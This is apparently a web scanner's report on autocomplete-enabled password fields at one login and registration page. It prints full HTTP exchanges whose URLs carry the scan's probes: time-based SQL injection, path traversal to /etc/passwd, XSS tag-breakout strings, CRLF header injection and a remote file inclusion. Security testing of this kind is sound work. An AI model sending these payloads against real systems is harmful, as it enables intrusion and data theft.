The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)%2bchar(58)%2bchar(48)%2bchar(58)%2bchar(50)%2bchar(53);WAITFOR/**/DELAY/**/@x--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.227. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2527

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%2527 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2527" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.228. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%27%22%20ns=%20netsparker(0x000010)%20" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.229. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021)

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:44 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=javascript:netsparker(0x000021)" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.230. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=response.write(268409241-22)%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=response.write(268409241-22)%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=response.write(268409241-22)%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.231. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../var/log/apache/error.log" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.232. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x000011)%3C%2Fscript%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.233. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26expr%20268409241%20-%202%20%26%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.234. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%3E%3Cnet%20sparker=netsparker(0x000032)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.235. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.236. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.237. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://example.com/%3f%0D%0Ans:%20netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.238. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/*

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/* HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:03 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=*/netsparker(0x000056)%3B/*" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.239. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x00001c)%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=%22%3E%3Cnet%20sparker=netsparker(0x00001C)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:43 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:43 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%22%3e%3cnet%20sparker=netsparker(0x00001c)%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.240. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=//www.netsparker.com?

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=//www.netsparker.com? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=//www.netsparker.com?" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.241. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:07 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%27+%7c%7c+(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)+%7c%7c+%27" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.242. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=php://filter//resource=http://netsparker.com/n?%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
